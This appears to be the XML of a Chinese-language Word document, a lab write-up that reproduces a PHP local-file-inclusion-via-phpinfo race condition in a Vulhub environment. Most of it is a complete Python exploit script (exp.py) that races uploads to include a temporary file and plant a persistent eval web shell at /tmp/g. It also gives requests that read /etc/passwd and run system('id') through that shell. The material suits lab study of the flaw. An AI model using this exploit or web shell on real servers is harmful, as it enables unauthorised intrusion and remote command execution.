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E4" w:rsidRPr="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6F0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、Vu</w:t>
      </w:r>
      <w:r>
        <w:t>lhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0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F0F" w:rsidRDefault="00CD6F0F">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00CD6F0F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CD6F0F" w:rsidRDefault="00CD6F0F">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00CD6F0F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6F0F" w:rsidRDefault="00CD6F0F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端口的/</w:t>
      </w:r>
      <w:r>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可看到一个P</w:t>
      </w:r>
      <w:r>
        <w:t>HPINFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E4334B" wp14:editId="10F320DB">
            <wp:extent cx="5274310" cy="2900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0F" w:rsidRDefault="00CD6F0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRPr="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6F0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、访问/</w:t>
      </w:r>
      <w:r>
        <w:t>lfi.php?file=/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可看见/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="198BFDAF" wp14:editId="3BC1C42E">
            <wp:extent cx="5274310" cy="1814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0F" w:rsidRDefault="00CD6F0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、写入</w:t>
      </w:r>
      <w:r>
        <w:t>exp.py</w:t>
      </w:r>
      <w:r w:rsidR="00FA1BF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功包含临时文件后，会执行</w:t>
      </w:r>
      <w:r w:rsidR="00FA1BF5" w:rsidRPr="00FA1BF5">
        <w:t>&lt;?php file_put_contents('/tmp/g', '&lt;?=eval($_REQUEST[1])?&gt;')?&gt;，写入一个新的文件/tmp/g，这个文件就会永久留在目标机器</w:t>
      </w:r>
      <w:r w:rsidR="00FA1BF5">
        <w:t>上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#!/usr/bin/python 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import sys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import threading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import socket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def setup(host, port):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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TAG="Security Test"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PAYLOAD="""%s\r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&lt;?php file_put_contents('/tmp/g', '&lt;?=eval($_REQUEST[1])?&gt;')?&gt;\r""" % TAG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REQ1_DATA="""-----------------------------7dbff1ded0714\r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Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r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Content-Type: text/plain\r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%s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-----------------------------7dbff1ded0714--\r""" % PAYLOAD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padding="A" * 5000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REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r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Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r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HTTP_ACCEPT: """ + padding + """\r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HTTP_USER_AGENT: """+padding+"""\r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HTTP_ACCEPT_LANGUAGE: """+padding+"""\r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HTTP_PRAGMA: """+padding+"""\r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Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r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Content-Length: %s\r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Host: %s\r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%s""" %(len(REQ1_DATA),host,REQ1_DATA)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#modify this to suit the LFI script   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LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r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User-Agent: Mozilla/4.0\r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Proxy-Connection: Keep-Alive\r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Host: %s\r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\r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"""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return (REQ1, TAG, LFIREQ)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def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    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s.connect((host, port))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s2.connect((host, port))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s.send(phpinforeq)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d = ""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while len(d) &lt; offset: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d += s.recv(offset)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try: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        i = d.index("[tmp_name] =&amp;gt; ")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fn = d[i+17:i+31]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except ValueError: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return None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s2.send(lfireq % (fn, host))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d = s2.recv(4096)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s.close()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s2.close()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if d.find(tag) != -1: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return fn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counter=0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class ThreadWorker(threading.Thread):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def __init__(self, e, l, m, *args):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threading.Thread.__init__(self)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self.event = e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self.lock =  l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self.maxattempts = m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self.args = args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def run(self):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global counter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while not self.event.is_set():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with self.lock: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if counter &gt;= self.maxattempts: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    return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counter+=1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try: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x = phpInfoLFI(*self.args)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if self.event.is_set():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    break                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if x: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    print "\nGot it! Shell created in /tmp/g"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    self.event.set()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    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except socket.error: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return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def getOffset(host, port, phpinforeq):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"""Gets offset of tmp_name in the php output"""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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.connect((host,port))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s.send(phpinforeq)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d = ""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while True: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i = s.recv(4096)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d+=i        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if i == "":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break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# detect the final chunk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if i.endswith("0\r\n\r\n"):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break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s.close()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i = d.find("[tmp_name] =&amp;gt; ")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if i == -1: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raise ValueError("No php tmp_name in phpinfo output")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print "found %s at %i" % (d[i:i+10],i)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# padded up a bit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return i+256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def main():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print "LFI With PHPInfo()"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print "-=" * 30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if len(sys.argv) &lt; 2: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print "Usage: %s host [port] [threads]" % sys.argv[0]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sys.exit(1)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try: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host = socket.gethostbyname(sys.argv[1])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except socket.error, e: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print "Error with hostname %s: %s" % (sys.argv[1], e)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sys.exit(1)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port=80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try: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port = int(sys.argv[2])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except IndexError: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pass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except ValueError, e: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print "Error with port %d: %s" % (sys.argv[2], e)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        sys.exit(1)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poolsz=10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try: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poolsz = int(sys.argv[3])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except IndexError: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pass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except ValueError, e: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print "Error with poolsz %d: %s" % (sys.argv[3], e)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sys.exit(1)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print "Getting initial offset...",  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reqphp, tag, reqlfi = setup(host, port)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offset = getOffset(host, port, reqphp)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sys.stdout.flush()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maxattempts = 1000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e = threading.Event()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l = threading.Lock()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print "Spawning worker pool (%d)..." % poolsz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sys.stdout.flush()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tp = []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for i in range(0,poolsz):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tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))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for t in tp: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t.start()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try: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while not e.wait(1):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if e.is_set():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break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with l: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sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))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sys.stdout.flush()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if counter &gt;= maxattempts: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        break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print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if e.is_set():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print "Woot!  \m/"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else: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    print ":("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except KeyboardInterrupt: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        print "\nTelling threads to shutdown..."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e.set()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print "Shuttin' down..."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for t in tp:</w:t>
      </w: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 xml:space="preserve">        t.join()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1BF5" w:rsidRPr="00FA1BF5" w:rsidRDefault="00FA1BF5" w:rsidP="00FA1BF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA1BF5" w:rsidRPr="00FA1BF5" w:rsidRDefault="00FA1BF5" w:rsidP="00FA1BF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA1BF5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>if __name__=="__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1BF5" w:rsidRPr="00FA1BF5" w:rsidRDefault="00FA1BF5" w:rsidP="00FA1BF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA1BF5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F"/>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、执行e</w:t>
      </w:r>
      <w:r>
        <w:t>xp.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，到第3</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个数据包时</w:t>
      </w:r>
      <w:r w:rsidR="00FA1BF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1BF5" w:rsidRDefault="00FA1BF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BF5" w:rsidRDefault="00FA1BF5">
                            <w:r w:rsidRPr="00FA1BF5">
                              <w:t>python exp.py your-ip 8080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jy9YH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FA1BF5" w:rsidRDefault="00FA1BF5">
                      <w:r w:rsidRPr="00FA1BF5">
                        <w:t>python exp.py your-ip 8080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6F0F" w:rsidRDefault="00FA1BF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FECC4A2" wp14:editId="537A9BB4">
            <wp:extent cx="5274310" cy="1247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0F" w:rsidRDefault="00CD6F0F">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用l</w:t>
      </w:r>
      <w:r>
        <w:t>fi.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，执行任意i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6F0F" w:rsidRDefault="00CD6F0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206262" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="13335" b="254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2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F0F" w:rsidRPr="00CD6F0F" w:rsidRDefault="00CD6F0F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lfi.php?file=/tmp/g&amp;1=system(%27id%27);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52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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00CD6F0F" w:rsidRPr="00CD6F0F" w:rsidRDefault="00CD6F0F">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:t>lfi.php?file=/tmp/g&amp;1=system(%27id%27);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6F0F" w:rsidRDefault="00CD6F0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29A284E" wp14:editId="68F1A3C4">
            <wp:extent cx="5274310" cy="436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6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3D1" w:rsidRDefault="00AD43D1" w:rsidP="00CD6F0F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AD43D1" w:rsidRDefault="00AD43D1" w:rsidP="00CD6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3D1" w:rsidRDefault="00AD43D1" w:rsidP="00CD6F0F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AD43D1" w:rsidRDefault="00AD43D1" w:rsidP="00CD6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A9"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="00AD43D1"/>
    <w:rsid w:val="00CD6F0F"/>
    <w:rsid w:val="00FA1BF5"/>
    <w:rsid w:val="00FD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EFFAC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{954E2ACB-54ED-4F1E-8837-D0B052E7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F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F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D6F0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D6F0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6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2022-05-29T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T09:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>